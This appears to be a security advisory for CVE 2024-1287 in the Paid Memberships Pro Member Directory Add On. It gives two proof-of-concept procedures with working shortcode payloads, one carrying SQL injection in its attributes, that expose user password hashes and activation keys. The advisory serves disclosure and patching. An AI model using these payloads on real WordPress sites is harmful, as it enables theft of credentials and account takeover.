Paid Memberships Pro – Member Directory Add On < 1.2.6 – Contributor+ Sensitive Information Disclosure via SQLi | CVE 2024-1287

Description

The plugin does not prevent users with at least the contributor role from leaking other users' sensitive information, including password hashes via an SQLi vector

Proof of Concept

1. ADMIN: Install Paid Memberships Pro
2. ADMIN: Install Paid Memberships Pro Member Directory Add On
3. CONTRIBUTOR: Add shortcode to any post and save
4. CONTRIBUTOR: Preview the post and see list of all users for a site ordered by user level descending and see it lists sensitive user information including user level, password hashes, and activation keys (used for pw resets)
5. ANYONE: If the post/page ends up being published with the shortcode, anyone without authentication can see the exposed details

Example shortcode: `[pmpro_member_directory fields="Password hash,user_pass;Login,user_login;User activiation key,user_activation_key;User ID,ID;User level,wp_user_level" levels="0) OR (1=1" order_by="1=1," order="CAST( ( SELECT meta_value FROM wp_usermeta WHERE user_id = u.ID AND meta_key = \x27wp_user_level\x27 ) AS SIGNED ) DESC"]`


1. ADMIN: Install Paid Memberships Pro
2. ADMIN: Install Paid Memberships Pro Member Directory Add On
3. CONTRIBUTOR: Add shortcode to any post and specify/guess a user ID and save
4. CONTRIBUTOR: Preview the post and see it render sensitive user information including user level, password hashes, and activation keys (used for pw resets)
5. ANYONE: If the post/page ends up being published with the shortcode, anyone without authentication can see the exposed details

Example shortcode: `[pmpro_member_profile fields="Password hash,user_pass;Login,user_login;User activiation key,user_activation_key;User ID,ID;User level,wp_user_level" user_id="1"]`